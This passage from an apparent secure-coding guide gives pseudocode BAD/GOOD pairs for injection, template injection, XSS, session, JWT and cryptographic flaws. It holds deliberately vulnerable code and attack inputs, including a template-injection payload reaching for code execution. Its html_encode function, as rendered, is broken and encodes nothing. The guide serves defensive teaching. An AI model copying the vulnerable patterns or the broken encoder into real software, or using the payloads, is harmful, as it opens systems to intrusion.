THROW Error("Invalid characters in credentials") + END IF + + user = mongodb.collection("users").find_one({username: username}) + + IF user IS NULL: + RETURN FALSE + END IF + + // Compare password hash, not plaintext + RETURN bcrypt.verify(password, user.password_hash) +END FUNCTION + +// Sanitize any object to remove operators +FUNCTION sanitize_query(obj): + IF typeof(obj) != "object": + RETURN obj + END IF + + sanitized = {} + FOR key, value IN obj: + // Block all MongoDB operators + IF key.starts_with("$"): + CONTINUE // Skip operator keys + END IF + + IF typeof(value) == "object": + // Recursively sanitize, but block nested operators + IF has_operator_keys(value): + THROW Error("Query operators not allowed") + END IF + END IF + + sanitized[key] = value + END FOR + RETURN sanitized +END FUNCTION +``` + +### 2.6 Template Injection (SSTI) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input in template strings +// ======================================== +FUNCTION render_greeting(username): + // Vulnerable: User input treated as template code + template_string = "Hello, " + username + "!" + RETURN template_engine.render_string(template_string) +END FUNCTION + +FUNCTION render_email(user_template, user_data): + // Dangerous: User-provided template + RETURN template_engine.render_string(user_template, user_data) +END FUNCTION + +// Attack: username = "{{config.SECRET_KEY}}" +// Result: Template engine evaluates and exposes secret key +// Attack: username = "{{''.__class__.__mro__[1].__subclasses__()}}" +// Result: Can achieve remote code execution in some engines + +// ======================================== +// GOOD: Use templates as data, not code +// ======================================== +FUNCTION render_greeting(username): + // Safe: User input passed as data to pre-defined template + template = template_engine.load("greeting.html") + RETURN template.render({username: escape_html(username)}) +END FUNCTION + +// greeting.html (static, not user-provided): +//

Hello, {{ username }}!

+ +FUNCTION render_email_safe(template_name, user_data): + // Safe: Only allow pre-defined templates + allowed_templates = ["welcome", "reset_password", "notification"] + + IF template_name NOT IN allowed_templates: + THROW Error("Invalid template name") + END IF + + // Sanitize all user data + safe_data = {} + FOR key, value IN user_data: + safe_data[key] = escape_html(string(value)) + END FOR + + template = template_engine.load(template_name + ".html") + RETURN template.render(safe_data) +END FUNCTION + +// For user-customizable content, use a safe subset +FUNCTION render_user_content(content): + // Use a sandboxed/logic-less template engine + // or plain text with variable substitution only + allowed_vars = ["name", "date", "product"] + + result = content + FOR var_name IN allowed_vars: + placeholder = "{{" + var_name + "}}" + IF var_name IN context: + result = result.replace(placeholder, escape_html(context[var_name])) + END IF + END FOR + + // Remove any remaining template syntax + result = regex.replace(result, "\{\{.*?\}\}", "") + + RETURN result +END FUNCTION +``` + +--- + +## 3. Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Improper Neutralization of Script-Related HTML Tags) +**Severity:** Critical | **Related:** [[XSS-Vulnerabilities]] + +> **Risk:** XSS has the **highest failure rate (86%)** in AI-generated code. AI models are 2.74x more likely to produce XSS-vulnerable code than human developers. XSS enables session hijacking, account takeover, and data theft. AI frequently generates direct string concatenation into HTML without encoding. + +### 3.1 Reflected XSS (Echoing User Input) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input directly echoed in response +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Vulnerable: User input inserted directly into HTML + html = "

Search results for: " + query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Vulnerable: Error parameter reflected without encoding + RETURN "
" + error_message + "
" +END FUNCTION + +// Attack: /search?q= +// Result: Script executes in victim's browser, stealing their session + +// ======================================== +// GOOD: HTML-encode all user input before rendering +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Safe: HTML-encode user input + safe_query = html_encode(query) + + html = "

Search results for: " + safe_query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Safe: Encode before inserting into HTML + RETURN "
" + html_encode(error_message) + "
" +END FUNCTION + +// HTML encoding function +FUNCTION html_encode(input): + result = input + result = result.replace("&", "&") + result = result.replace("<", "<") + result = result.replace(">", ">") + result = result.replace('"', """) + result = result.replace("'", "'") + RETURN result +END FUNCTION +``` + +### 3.2 Stored XSS (Database to Page Without Encoding) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Stored data rendered without encoding +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Vulnerable: Stored data rendered directly + html += "
" + html += "" + comment.author + "" + html += "

" + comment.text + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Vulnerable: User-controlled fields rendered directly + html = "

" + user.display_name + "

" + html += "
" + user.biography + "
" + RETURN html +END FUNCTION + +// Attack: Attacker saves comment with text: +// Result: Every user viewing the page executes attacker's script + +// ======================================== +// GOOD: Encode all database-sourced content +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Safe: All stored data is encoded + html += "
" + html += "" + html_encode(comment.author) + "" + html += "

" + html_encode(comment.text) + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Safe: Encode user-controlled fields + html = "

" + html_encode(user.display_name) + "

" + html += "
" + html_encode(user.biography) + "
" + RETURN html +END FUNCTION + +// Better: Use templating engine with auto-escaping +FUNCTION display_comments_template(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + // Templating engines like Jinja2, Handlebars auto-escape by default + RETURN template.render("comments.html", {comments: comments}) +END FUNCTION +``` + +### 3.3 DOM-Based XSS (innerHTML, document.write) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Dangerous DOM manipulation methods +// ======================================== +FUNCTION display_welcome_message(): + // Vulnerable: URL parameter into innerHTML + params = parse_url_parameters(window.location.search) + username = params.get("name") + + document.getElementById("welcome").innerHTML = + "Welcome, " + username + "!" +END FUNCTION + +FUNCTION update_content(user_content): + // Vulnerable: User content via innerHTML + document.getElementById("content").innerHTML = user_content +END FUNCTION + +FUNCTION load_dynamic_script(url): + // Dangerous: document.write with external content + document.write("") +END FUNCTION + +// Attack: ?name= +// Result: XSS via event handler, bypasses simple " + html += "" + + // Attacker-injected scripts without nonce will be blocked + RETURN html +END FUNCTION + +// CSP report-only mode for testing +FUNCTION configure_csp_reporting(): + server.set_header("Content-Security-Policy-Report-Only", + "default-src 'self'; report-uri /csp-report" + ) +END FUNCTION +``` + +### 3.5 Improper Output Encoding (Context-Specific) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Wrong encoding for context +// ======================================== +FUNCTION render_javascript_variable(user_input): + // Vulnerable: HTML encoding doesn't protect JavaScript context + safe_for_html = html_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +FUNCTION render_url_parameter(user_input): + // Vulnerable: No URL encoding + url = "https://example.com/page?data=" + user_input + RETURN "
Link" +END FUNCTION + +FUNCTION render_css_value(user_color): + // Vulnerable: No CSS encoding + style = "
Text
" + RETURN style +END FUNCTION + +// Attack on JS context: User input = "'; alert(1); //'" +// Result: var userData = ''; alert(1); //''; - Script injection + +// ======================================== +// GOOD: Context-specific encoding +// ======================================== + +// JavaScript string context +FUNCTION js_encode(input): + result = input + result = result.replace("\\", "\\\\") + result = result.replace("'", "\\'") + result = result.replace('"', '\\"') + result = result.replace("\n", "\\n") + result = result.replace("\r", "\\r") + result = result.replace("<", "\\x3c") // Prevent breakout + result = result.replace(">", "\\x3e") + RETURN result +END FUNCTION + +FUNCTION render_javascript_variable(user_input): + // Safe: Proper JavaScript encoding + safe_for_js = js_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +// Better: Use JSON encoding for complex data +FUNCTION render_javascript_data(user_data): + // Safest: JSON encoding handles all edge cases + json_data = json_encode(user_data) + + script = "" + RETURN script +END FUNCTION + +// URL context +FUNCTION render_url_parameter(user_input): + // Safe: URL encoding + encoded_param = url_encode(user_input) + url = "https://example.com/page?data=" + encoded_param + + // Also HTML-encode the entire URL for the href attribute + RETURN "Link" +END FUNCTION + +// CSS context +FUNCTION css_encode(input): + // Only allow safe CSS values + allowed_pattern = "^[a-zA-Z0-9#]+$" + IF NOT regex.match(allowed_pattern, input): + RETURN "inherit" // Safe default + END IF + RETURN input +END FUNCTION + +FUNCTION render_css_value(user_color): + // Safe: Validate and encode CSS value + safe_color = css_encode(user_color) + style = "
Text
" + RETURN style +END FUNCTION + +// HTML attribute context +FUNCTION render_attribute(attr_name, user_value): + // HTML-encode and quote attribute value + safe_value = html_encode(user_value) + RETURN attr_name + '="' + safe_value + '"' +END FUNCTION +``` + +--- + +## 4. Authentication and Session Management + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-521 (Weak Password Requirements), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-613 (Insufficient Session Expiration) +**Severity:** Critical | **Related:** [[Authentication-Failures]] + +> **Risk:** Authentication failures are a leading cause of data breaches. AI-generated code often implements weak password policies, insecure session handling, and vulnerable JWT patterns learned from outdated tutorials. Proper authentication requires defense in depth: strong credentials, secure sessions, rate limiting, and multi-factor authentication. + +### 4.1 Weak Password Requirements + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No or weak password validation +// ======================================== +FUNCTION register_user(username, password): + // Vulnerable: No password strength requirements + IF password.length < 4: + THROW Error("Password too short") + END IF + + // No checks for complexity, common passwords, or breaches + hash = simple_hash(password) // Often MD5 or SHA1 + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_weak(password): + // Vulnerable: Only checks length + RETURN password.length >= 6 +END FUNCTION + +// Problems: +// - Allows "123456", "password", "qwerty" +// - No complexity requirements +// - No check against breached password lists + +// ======================================== +// GOOD: Strong password policy with multiple checks +// ======================================== +FUNCTION register_user(username, password): + validation_result = validate_password_strength(password) + + IF NOT validation_result.is_valid: + THROW Error(validation_result.message) + END IF + + // Use strong hashing algorithm with salt + hash = bcrypt.hash(password, rounds=12) + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_strength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many use 12+) + IF password.length < 12: + errors.append("Password must be at least 12 characters") + END IF + + // Maximum length (prevent DoS via very long passwords) + IF password.length > 128: + errors.append("Password must not exceed 128 characters") + END IF + + // Check character diversity + has_upper = regex.search("[A-Z]", password) + has_lower = regex.search("[a-z]", password) + has_digit = regex.search("[0-9]", password) + has_special = regex.search("[!@#$%^&*(),.?\":{}|<>]", password) + + IF NOT (has_upper AND has_lower AND has_digit): + errors.append("Password must contain uppercase, lowercase, and numbers") + END IF + + // Check against common passwords list + IF is_common_password(password): + errors.append("Password is too common, choose a unique password") + END IF + + // Check against breached passwords (via k-Anonymity API) + IF is_breached_password(password): + errors.append("Password found in data breach, choose another") + END IF + + // Check for username in password + IF password.lower().contains(username.lower()): + errors.append("Password cannot contain username") + END IF + + RETURN { + is_valid: errors.length == 0, + message: errors.join("; ") + } +END FUNCTION + +// Check breached passwords using k-Anonymity (e.g., HaveIBeenPwned API) +FUNCTION is_breached_password(password): + hash = sha1(password).upper() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send hash prefix to API (privacy-preserving) + response = http.get("https://api.pwnedpasswords.com/range/" + prefix) + hashes = parse_pwned_response(response) + + RETURN suffix IN hashes +END FUNCTION +``` + +### 4.2 Missing Rate Limiting on Auth Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting on authentication +// ======================================== +FUNCTION login(username, password): + // Vulnerable: No limit on login attempts + user = database.find_user(username) + + IF user IS NULL: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + IF bcrypt.verify(password, user.password_hash): + RETURN {success: TRUE, token: generate_token(user)} + ELSE: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF +END FUNCTION + +// Problems: +// - Allows unlimited password guessing (brute force) +// - Allows credential stuffing attacks +// - No account lockout protection + +// ======================================== +// GOOD: Rate limiting with progressive delays +// ======================================== +FUNCTION login(username, password): + client_ip = request.get_client_ip() + + // Check IP-based rate limit (protects against distributed attacks) + IF is_ip_rate_limited(client_ip): + log.warning("Rate limited IP attempted login", {ip: client_ip}) + RETURN {success: FALSE, error: "Too many attempts, try again later"} + END IF + + // Check account-based rate limit (protects specific accounts) + IF is_account_rate_limited(username): + log.warning("Rate limited account attempted login", {username: username}) + RETURN {success: FALSE, error: "Account temporarily locked"} + END IF + + user = database.find_user(username) + + // Use constant-time comparison to prevent timing attacks + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + record_failed_attempt(username, client_ip) + // Generic error message (don't reveal if user exists) + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Successful login - reset counters + clear_failed_attempts(username, client_ip) + + RETURN {success: TRUE, token: generate_token(user)} +END FUNCTION + +// IP-based rate limiting +FUNCTION is_ip_rate_limited(ip): + key = "login_attempts:ip:" + ip + attempts = rate_limiter.get(key, default=0) + + // Allow 10 attempts per 15 minutes per IP + RETURN attempts >= 10 +END FUNCTION + +// Account-based rate limiting with progressive lockout +FUNCTION is_account_rate_limited(username): + key = "login_attempts:user:" + username + attempts = rate_limiter.get(key, default=0) + + // Progressive lockout: + // 5 attempts: 1 minute lockout + // 10 attempts: 5 minute lockout + // 15 attempts: 15 minute lockout + // 20+ attempts: 1 hour lockout + + IF attempts >= 20: + lockout_time = 3600 // 1 hour + ELSE IF attempts >= 15: + lockout_time = 900 // 15 minutes + ELSE IF attempts >= 10: + lockout_time = 300 // 5 minutes + ELSE IF attempts >= 5: + lockout_time = 60 // 1 minute + ELSE: + RETURN FALSE + END IF + + last_attempt = rate_limiter.get_timestamp(key) + RETURN (current_time() - last_attempt) < lockout_time +END FUNCTION + +FUNCTION record_failed_attempt(username, ip): + // Increment both counters with TTL + rate_limiter.increment("login_attempts:ip:" + ip, ttl=900) + rate_limiter.increment("login_attempts:user:" + username, ttl=3600) + + // Alert on suspicious patterns + ip_attempts = rate_limiter.get("login_attempts:ip:" + ip) + IF ip_attempts >= 50: + security_alert("Possible brute force attack from IP: " + ip) + END IF +END FUNCTION +``` + +### 4.3 Insecure Session Token Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable session tokens +// ======================================== +FUNCTION create_session_weak(user_id): + // Vulnerable: Predictable token based on user ID + token = "session_" + user_id + "_" + current_timestamp() + RETURN token +END FUNCTION + +FUNCTION create_session_sequential(): + // Vulnerable: Sequential/incremental tokens + GLOBAL session_counter + session_counter = session_counter + 1 + RETURN "session_" + session_counter +END FUNCTION + +FUNCTION create_session_weak_random(): + // Vulnerable: Using Math.random() or similar weak PRNG + token = "" + FOR i = 1 TO 32: + token = token + random_char() // Math.random() based + END FOR + RETURN token +END FUNCTION + +// Attack: Attacker can predict/enumerate session tokens +// - Timestamp-based: Try tokens from recent timestamps +// - Sequential: Try nearby session IDs +// - Weak random: Seed prediction or insufficient entropy + +// ======================================== +// GOOD: Cryptographically secure session tokens +// ======================================== +FUNCTION create_session(user_id): + // Generate cryptographically secure random token + // Use 256 bits (32 bytes) minimum for security + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) // URL-safe encoding + + // Store session with metadata + session_data = { + user_id: user_id, + created_at: current_timestamp(), + expires_at: current_timestamp() + SESSION_LIFETIME, + ip_address: request.get_client_ip(), + user_agent: request.get_user_agent() + } + + // Store hashed token (protect against database leaks) + token_hash = sha256(token) + session_store.set(token_hash, session_data) + + RETURN token +END FUNCTION + +FUNCTION validate_session(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + session = session_store.get(token_hash) + + IF session IS NULL: + RETURN NULL + END IF + + // Check expiration + IF current_timestamp() > session.expires_at: + session_store.delete(token_hash) + RETURN NULL + END IF + + // Optional: Validate IP/User-Agent consistency + IF session.ip_address != request.get_client_ip(): + log.warning("Session IP mismatch", { + expected: session.ip_address, + actual: request.get_client_ip() + }) + // Decide whether to invalidate or just log + END IF + + RETURN session +END FUNCTION + +// Secure cookie configuration +FUNCTION set_session_cookie(response, token): + response.set_cookie("session", token, { + httponly: TRUE, // Prevent JavaScript access + secure: TRUE, // HTTPS only + samesite: "Strict", // Prevent CSRF + max_age: SESSION_LIFETIME, + path: "/" + }) +END FUNCTION +``` + +### 4.4 Session Fixation Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Session ID not regenerated on login +// ======================================== +FUNCTION login_vulnerable(username, password): + // Session ID was set when user first visited (before login) + session_id = request.get_cookie("session_id") + + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // Vulnerable: Reusing pre-authentication session ID + session_store.set(session_id, {user_id: user.id, authenticated: TRUE}) + RETURN {success: TRUE} +END FUNCTION + +// Attack scenario: +// 1. Attacker visits site, gets session_id=ABC123 +// 2. Attacker sends victim link: https://site.com?session_id=ABC123 +// 3. Victim logs in with attacker's session ID +// 4. Attacker uses session_id=ABC123 to access victim's account + +// ======================================== +// GOOD: Regenerate session on authentication changes +// ======================================== +FUNCTION login_secure(username, password): + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // CRITICAL: Invalidate old session and create new one + old_session_id = request.get_cookie("session_id") + IF old_session_id IS NOT NULL: + session_store.delete(old_session_id) + END IF + + // Generate completely new session ID + new_session = create_session(user.id) + + // Set new session cookie + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN {success: TRUE} +END FUNCTION + +// Also regenerate session on privilege escalation +FUNCTION elevate_privileges(user, new_role): + // Invalidate current session + old_session_id = request.get_cookie("session_id") + session_store.delete(old_session_id) + + // Create new session with elevated privileges + new_session = create_session(user.id) + new_session.role = new_role + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session +END FUNCTION + +// Regenerate session periodically for long-lived sessions +FUNCTION check_session_rotation(session): + // Rotate session every 15 minutes for active users + IF current_timestamp() - session.created_at > 900: + new_session = create_session(session.user_id) + new_session.data = session.data // Preserve session data + + session_store.delete(session.id) + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session + END IF + + RETURN session +END FUNCTION +``` + +### 4.5 JWT Misuse (None Algorithm, Weak Secrets, Sensitive Data) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Common JWT security mistakes +// ======================================== + +// Mistake 1: Not verifying algorithm (none algorithm attack) +FUNCTION verify_jwt_vulnerable(token): + // Vulnerable: Accepts whatever algorithm is in the header + decoded = jwt.decode(token, SECRET_KEY) // Attacker sets alg: "none" + RETURN decoded +END FUNCTION + +// Mistake 2: Weak or short secret key +CONSTANT JWT_SECRET = "secret123" // Easily brute-forced + +FUNCTION create_jwt_weak(user_id): + payload = {user_id: user_id, exp: current_time() + 86400} + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// Mistake 3: Sensitive data in payload (JWTs are base64, not encrypted!) +FUNCTION create_jwt_exposed(user): + payload = { + user_id: user.id, + email: user.email, + ssn: user.social_security_number, // PII in token! + credit_card: user.card_number, // Sensitive data exposed! + password_hash: user.password_hash, // Never put this in JWT! + exp: current_time() + 86400 + } + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// Mistake 4: No expiration or very long expiration +FUNCTION create_jwt_no_expiry(user_id): + payload = {user_id: user_id} // No exp claim! + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// ======================================== +// GOOD: Secure JWT implementation +// ======================================== + +// Use a strong secret (256+ bits for HS256) +CONSTANT JWT_SECRET = environment.get("JWT_SECRET") // From secret manager + +FUNCTION initialize_jwt(): + // Validate secret strength at startup + IF JWT_SECRET IS NULL OR JWT_SECRET.length < 32: + THROW Error("JWT_SECRET must be at least 256 bits") + END IF +END FUNCTION + +FUNCTION create_jwt_secure(user_id): + now = current_time() + + payload = { + // Standard claims + sub: user_id, // Subject + iat: now, // Issued at + exp: now + 3600, // Expiration (1 hour max for access tokens) + nbf: now, // Not before + + // Custom claims (non-sensitive only!) + role: user.role // Roles are OK + // Never include: passwords, PII, payment info + } + + // Explicitly specify algorithm + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +FUNCTION verify_jwt_secure(token): + TRY: + // CRITICAL: Explicitly specify allowed algorithms + decoded = jwt.decode(token, JWT_SECRET, algorithms=["HS256"]) + + // Additional validation + IF decoded.exp < current_time(): + THROW Error("Token expired") + END IF + + IF decoded.nbf > current_time(): + THROW Error("Token not yet valid") + END IF + + RETURN decoded + + CATCH JWTError as e: + log.warning("JWT verification failed", {error: e.message}) + RETURN NULL + END TRY +END FUNCTION + +// For sensitive applications, use asymmetric keys (RS256) +FUNCTION create_jwt_asymmetric(user_id): + private_key = load_private_key("jwt_private.pem") + + payload = { + sub: user_id, + iat: current_time(), + exp: current_time() + 3600 + } + + // Sign with private key + RETURN jwt.encode(payload, private_key, algorithm="RS256") +END FUNCTION + +FUNCTION verify_jwt_asymmetric(token): + public_key = load_public_key("jwt_public.pem") + + // Verify with public key (can be shared safely) + RETURN jwt.decode(token, public_key, algorithms=["RS256"]) +END FUNCTION + +// Implement refresh token pattern for long-lived sessions +FUNCTION create_token_pair(user_id): + // Short-lived access token (15 minutes) + access_token = create_jwt_secure(user_id, expiry=900) + + // Long-lived refresh token (7 days) - store in DB for revocation + refresh_token = crypto.secure_random_bytes(32).to_base64() + database.insert("refresh_tokens", { + token_hash: sha256(refresh_token), + user_id: user_id, + expires_at: current_time() + 604800 + }) + + RETURN { + access_token: access_token, + refresh_token: refresh_token + } +END FUNCTION +``` + +### 4.6 Missing MFA Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Single-factor authentication only +// ======================================== +FUNCTION login_single_factor(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Immediately grant full access after password verification + token = create_session(user.id) + RETURN {success: TRUE, token: token} +END FUNCTION + +// Problems: +// - Compromised password = full account takeover +// - No protection against credential stuffing +// - Phishing attacks succeed completely +// - No step-up authentication for sensitive operations + +// ======================================== +// GOOD: MFA-aware authentication flow +// ======================================== +FUNCTION login_with_mfa(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Check if MFA is enabled + IF user.mfa_enabled: + // Create partial session (not fully authenticated) + partial_token = create_partial_session(user.id) + + RETURN { + success: FALSE, + mfa_required: TRUE, + partial_token: partial_token, + mfa_methods: get_user_mfa_methods(user.id) + } + END IF + + // If MFA not enabled, encourage setup + token = create_session(user.id) + RETURN { + success: TRUE, + token: token, + mfa_suggestion: user.is_admin // Strongly suggest MFA for admins + } +END FUNCTION + +FUNCTION verify_mfa(partial_token, mfa_code, mfa_method): + session = get_partial_session(partial_token) + + IF session IS NULL OR session.expires_at < current_time(): + RETURN {success: FALSE, error: "Session expired, please login again"} + END IF + + user = database.get_user(session.user_id) + + // Verify MFA code based on method + is_valid = FALSE + + IF mfa_method == "totp": + is_valid = verify_totp(user.totp_secret, mfa_code) + ELSE IF mfa_method == "sms": + is_valid = verify_sms_code(user.id, mfa_code) + ELSE IF mfa_method == "backup": + is_valid = verify_backup_code(user.id, mfa_code) + END IF + + IF NOT is_valid: + record_failed_mfa_attempt(user.id) + RETURN {success: FALSE, error: "Invalid verification code"} + END IF + + // MFA verified - create full session + delete_partial_session(partial_token) + token = create_session(user.id) + + RETURN {success: TRUE, token: token} +END FUNCTION + +// TOTP verification with time window +FUNCTION verify_totp(secret, code): + // Allow 1 step before and after for clock drift (30 second windows) + FOR step IN [-1, 0, 1]: + expected = generate_totp(secret, time_step=step) + IF constant_time_compare(code, expected): + RETURN TRUE + END IF + END FOR + RETURN FALSE +END FUNCTION + +// Step-up authentication for sensitive operations +FUNCTION require_recent_auth(user_session, max_age_seconds): + IF current_time() - user_session.authenticated_at > max_age_seconds: + RETURN { + requires_reauth: TRUE, + message: "Please re-enter your password for this action" + } + END IF + RETURN {requires_reauth: FALSE} +END FUNCTION + +FUNCTION perform_sensitive_action(session, action, password): + // Require recent password entry for sensitive actions + user = database.get_user(session.user_id) + + IF NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid password"} + END IF + + // Update authentication timestamp + session.authenticated_at = current_time() + + // Perform the sensitive action + RETURN execute_action(action) +END FUNCTION +``` + +### 4.7 Insecure Password Reset Flows + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Insecure password reset implementations +// ======================================== + +// Mistake 1: Predictable reset tokens +FUNCTION create_reset_token_weak(user_id): + // Vulnerable: MD5 of user_id + timestamp is guessable + token = md5(user_id + current_timestamp()) + database.save_reset_token(user_id, token) + RETURN token +END FUNCTION + +// Mistake 2: Token never expires +FUNCTION request_password_reset_no_expiry(email): + user = database.find_user_by_email(email) + token = generate_token() + // Vulnerable: No expiration set + database.save_reset_token(user.id, token) + send_email(email, "Reset: " + BASE_URL + "/reset?token=" + token) +END FUNCTION + +// Mistake 3: Token not invalidated after use +FUNCTION reset_password_reusable(token, new_password): + user_id = database.get_user_by_reset_token(token) + user = database.get_user(user_id) + user.password_hash = hash(new_password) + database.save(user) + // Vulnerable: Token still valid, can be reused! +END FUNCTION + +// Mistake 4: User enumeration via different responses +FUNCTION request_reset_enumeration(email): + user = database.find_user_by_email(email) + IF user IS NULL: + RETURN {error: "No account found with this email"} // Reveals info! + END IF + // ... send reset email + RETURN {success: TRUE, message: "Reset email sent"} +END FUNCTION + +// Mistake 5: Sending password in email +FUNCTION reset_password_insecure(email): + user = database.find_user_by_email(email) + new_password = generate_random_password() + user.password_hash = hash(new_password) + // Vulnerable: Password in plaintext email + send_email(email, "Your new password is: " + new_password) +END FUNCTION + +// ======================================== +// GOOD: Secure password reset flow +// ======================================== +FUNCTION request_password_reset(email): + // Always return same response to prevent enumeration + user = database.find_user_by_email(email) + + IF user IS NOT NULL: + // Invalidate any existing reset tokens + database.delete_reset_tokens(user.id) + + // Generate cryptographically secure token + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) + + // Store hashed token with expiration + token_hash = sha256(token) + database.save_reset_token({ + user_id: user.id, + token_hash: token_hash, + expires_at: current_time() + 3600, // 1 hour expiration + created_at: current_time() + }) + + // Send reset email + reset_url = BASE_URL + "/reset-password?token=" + token + send_email(user.email, "password_reset", {reset_url: reset_url}) + + log.info("Password reset requested", {user_id: user.id}) + END IF + + // Same response whether user exists or not + RETURN { + success: TRUE, + message: "If an account exists, a reset email has been sent" + } +END FUNCTION + +FUNCTION validate_reset_token(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + reset_record = database.find_reset_token(token_hash) + + IF reset_record IS NULL: + log.warning("Invalid reset token attempted") + RETURN NULL + END IF + + // Check expiration + IF current_time() > reset_record.expires_at: + database.delete_reset_token(token_hash) + RETURN NULL + END IF + + RETURN reset_record +END FUNCTION + +FUNCTION reset_password(token, new_password): + reset_record = validate_reset_token(token) + + IF reset_record IS NULL: + RETURN {success: FALSE, error: "Invalid or expired reset link"} + END IF + + // Validate new password strength + validation = validate_password_strength(new_password) + IF NOT validation.is_valid: + RETURN {success: FALSE, error: validation.message} + END IF + + user = database.get_user(reset_record.user_id) + + // Check if new password is same as old + IF bcrypt.verify(new_password, user.password_hash): + RETURN {success: FALSE, error: "New password must be different"} + END IF + + // Update password + user.password_hash = bcrypt.hash(new_password, rounds=12) + database.save(user) + + // CRITICAL: Invalidate the reset token + database.delete_reset_token(sha256(token)) + + // Invalidate all existing sessions (force re-login) + session_store.delete_all_user_sessions(user.id) + + // Send confirmation email + send_email(user.email, "password_changed", { + timestamp: current_time(), + ip_address: request.get_client_ip() + }) + + log.info("Password reset completed", {user_id: user.id}) + + RETURN {success: TRUE, message: "Password reset successfully"} +END FUNCTION + +// Additional security: Limit reset requests +FUNCTION rate_limit_reset_requests(email): + key = "password_reset:" + sha256(email) + attempts = rate_limiter.get(key, default=0) + + IF attempts >= 3: + // Max 3 reset requests per hour + RETURN FALSE + END IF + + rate_limiter.increment(key, ttl=3600) + RETURN TRUE +END FUNCTION +``` + +--- + +## 5. Cryptographic Failures + +**CWE References:** CWE-327 (Use of Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-330 (Use of Insufficiently Random Values), CWE-326 (Inadequate Encryption Strength), CWE-759 (Use of One-Way Hash without a Salt) +**Severity:** High to Critical | **Related:** [[Cryptographic-Misuse]] + +> **Risk:** AI models frequently suggest outdated or weak cryptographic algorithms (MD5, SHA-1, DES) learned from decades of legacy code in training data. Cryptographic failures lead to data exposure, password compromise, and authentication bypass. A 14% failure rate for CWE-327 was documented in AI-generated code, with "significant increase" in encryption vulnerabilities when using AI assistants. + +### 5.1 Using Deprecated Algorithms (MD5, SHA1 for Security, DES) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Deprecated hash algorithms for security +// ======================================== +FUNCTION hash_password_weak(password): + // Vulnerable: MD5 is cryptographically broken + RETURN md5(password) +END FUNCTION + +FUNCTION verify_integrity_weak(data): + // Vulnerable: SHA-1 has known collision attacks + RETURN sha1(data) +END FUNCTION + +FUNCTION encrypt_data_weak(plaintext, key): + // Vulnerable: DES uses 56-bit keys (trivially breakable) + cipher = DES.new(key, mode=ECB) + RETURN cipher.encrypt(plaintext) +END 